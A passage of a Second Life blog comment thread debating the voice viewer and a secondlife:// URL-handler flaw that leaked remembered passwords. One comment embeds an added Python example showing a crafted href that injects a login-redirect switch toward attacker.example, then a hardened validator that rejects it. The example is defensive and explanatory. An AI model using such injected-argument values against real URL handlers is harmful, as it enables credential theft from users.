    Please do keep a viewer alive for those of us who can’t use Voice for hearing reasons, or who just don’t want to bother with it. I myself am using the 1.18.0.6 client, and I would like to keep using this style. I prefer the 1.18.0.6 interface and non-voice over the other viewer/client interfaces. I do not want to be forced to use the voice-style update and interface.

    All of us who use the 1.18.0.6 style would be very grateful for a version like this when the required upgrade is out.

  94. Jabath Steuart says:

    For those who don’t understand the jargon, here is the exploit:

    You go to a web page in Internet Explorer with SL not running, the webpage has some nasty code in it that launches SL (through what they call a url handler) and tries to log in. BUT the code tells SL to log in to the nasty cracker’s server, not the LL server. If you have the “remember password” box checked on the SL login screen, your password is sent to the cracker’s server. Your login will then fail.

    If SL IS running when you go to the bad web page, it will not try to log in, and it won’t send your password. The map might pop up though.

    If you are using Firefox and not IE, the same thing happens, except Firefox does the URL handler thing properly, and SL won’t send your password to the cracker.

    Q: Whose fault is this? LL and Microsoft
    Q: What should I do about it?
    A: Minimum: Uncheck the Remember Password box and wait for the update.
    Reasonable: Set IE security settings to high and never use it again. Install Firefox or Opera browser and set it to be your default browser. Change your SL password (and all your other passwords) bi-monthly or better. Use a password of at least 8 characters using lowercase and uppercase letters, numbers and at least one symbol

    http://www.securitystats.com/tools/password.php
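    The mechanism described in the comment above, shown in code as an added example that is not part of this thread or of Linden Lab’s viewer: a protocol-handler registration pastes the whole href into the launch command line, so a stray double quote in the URL ends the -url argument and anything after it is parsed as further switches. The launch template, the placeholder “-loginuri” switch and the attacker hostname are assumptions made for illustration; the legitimate secondlife://region/x/y/z shape is taken from comment 92, and the coordinate limits are assumed. The hardened version validates the URL once (after a single percent-decode), rebuilds it from parsed parts, and passes it as a separate argv element, so no page-supplied text can become a switch.

```python
import re
from urllib.parse import quote, unquote

# Simplified launch template in the style of a protocol-handler registry entry:
# the handler replaces %1 with the full URL from the page's href. The real
# entry, its path and the switch names are not on the page (assumption).
LAUNCH_TEMPLATE = 'SecondLife.exe -url "%1"'

# Constructed malicious href: the closing quote ends the -url argument and the
# rest is parsed as a second switch. "-loginuri" is a placeholder switch name
# (assumption); the attack only needs some switch that redirects login.
EVIL_HREF = 'secondlife://ahern/128/128/0" -loginuri "http://attacker.example/login'
GOOD_HREF = "secondlife://ahern/128/128/0"


def split_cmdline(cmdline):
    """Minimal Windows-style splitter: whitespace separates arguments and a
    double-quoted span is one argument (quotes stripped). No escape handling,
    which is enough to show how a quote inside %1 breaks argument boundaries."""
    args, cur, in_quote, have = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
            have = True
        elif ch.isspace() and not in_quote:
            if have:
                args.append("".join(cur))
                cur, have = [], False
        else:
            cur.append(ch)
            have = True
    if have:
        args.append("".join(cur))
    return args


def unsafe_argv(href):
    """Vulnerable behaviour: the href text is pasted into the command line as-is."""
    return split_cmdline(LAUNCH_TEMPLATE.replace("%1", href))


# Only the teleport form secondlife://region/x/y/z is accepted. Region names:
# letters, digits and single spaces; x, y in 0-255 and z in 0-4096 are assumed
# limits, not taken from the page.
_SLURL = re.compile(
    r"secondlife://(?P<region>[A-Za-z0-9]+(?: [A-Za-z0-9]+)*)"
    r"/(?P<x>\d{1,3})/(?P<y>\d{1,3})/(?P<z>\d{1,4})/?"
)


def parse_slurl(href):
    """Return {'region','x','y','z'} for a well-formed SLURL, else None.
    Percent-decoding happens exactly once, before matching, so an encoded
    quote (%22) or any other stray character cannot slip past the pattern."""
    m = _SLURL.fullmatch(unquote(href))
    if not m:
        return None
    x, y, z = (int(m.group(k)) for k in ("x", "y", "z"))
    if x > 255 or y > 255 or z > 4096:
        return None
    return {"region": m.group("region"), "x": x, "y": y, "z": z}


def safe_argv(href):
    """Hardened launch: validate, rebuild the URL from its parsed parts, and pass
    it as its own argv element so nothing from the page can become a switch.
    Raises ValueError for anything that is not a plain teleport URL."""
    parsed = parse_slurl(href)
    if parsed is None:
        raise ValueError("rejected secondlife:// URL: %r" % href)
    canonical = "secondlife://%s/%d/%d/%d" % (
        quote(parsed["region"]), parsed["x"], parsed["y"], parsed["z"])
    return ["SecondLife.exe", "-url", canonical]


if __name__ == "__main__":
    print("unsafe:", unsafe_argv(EVIL_HREF))   # extra -loginuri switch appears
    print("safe  :", safe_argv(GOOD_HREF))
    try:
        safe_argv(EVIL_HREF)
    except ValueError as err:
        print("safe  :", err)
```

    Running it prints the injected “-loginuri” switch in the unsafe argv and a rejection for the same href in the safe path. The general lesson is the one the thread circles around: a handler must treat the URL as untrusted data, never as a fragment of its own command line.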

  95. Jabath Steuart says:

    I posted the link above so you could read the tips, if you want to use the password strength meter, please follow this advice:

    “Please note that although we will not store the password you enter, it’s never a good idea to send your password to someone you don’t know. Instead, we recommend testing a password which is *similar* to one you might use.”

  96. Unmitigated Gall says:

    TAMARA,

    MANY OF US DO WANT VOICE. VERY SIMPLE: YOU DON’T WANT IT, DON’T ACTIVATE IT. SO DAMN SIMPLE.

  97. Unmitigated Gall says:

    Strange that all calls using the “secondlife://” request are now considered someone trying to exploit the vulnerability. I have used that call for years to link people into the game from email. All that has changed is you have become aware that someone is now using a hack to get user info. The only change you should make is removal of the “Remember Password” box. Issue solved, all platforms and viewers.

  98. About the voice viewer problem: you can simply Edit the Preferences and turn off Voice Chat. There is a checkbox on the Voice Chat tab. The new viewer still has a slightly different chat window, but at least you will now not have voice.

  99. Sofia Westwick says:

    It’s not just about voice, it’s about the interface. The voice one is very different from 1.18.0.6, and a lot of us do not want to be stuck with the new interface.

    So we will be happy with one in the same style as 1.18.0.6

  100. Re: Firefox vulnerability debate.

    http://www.mozilla.org/security/announce/2007/mfsa2007-27.html

    This issue can only occur for Firefox users who don’t update and are running a version prior to Firefox 2.0.0.6; the current version is Firefox 2.0.0.7.
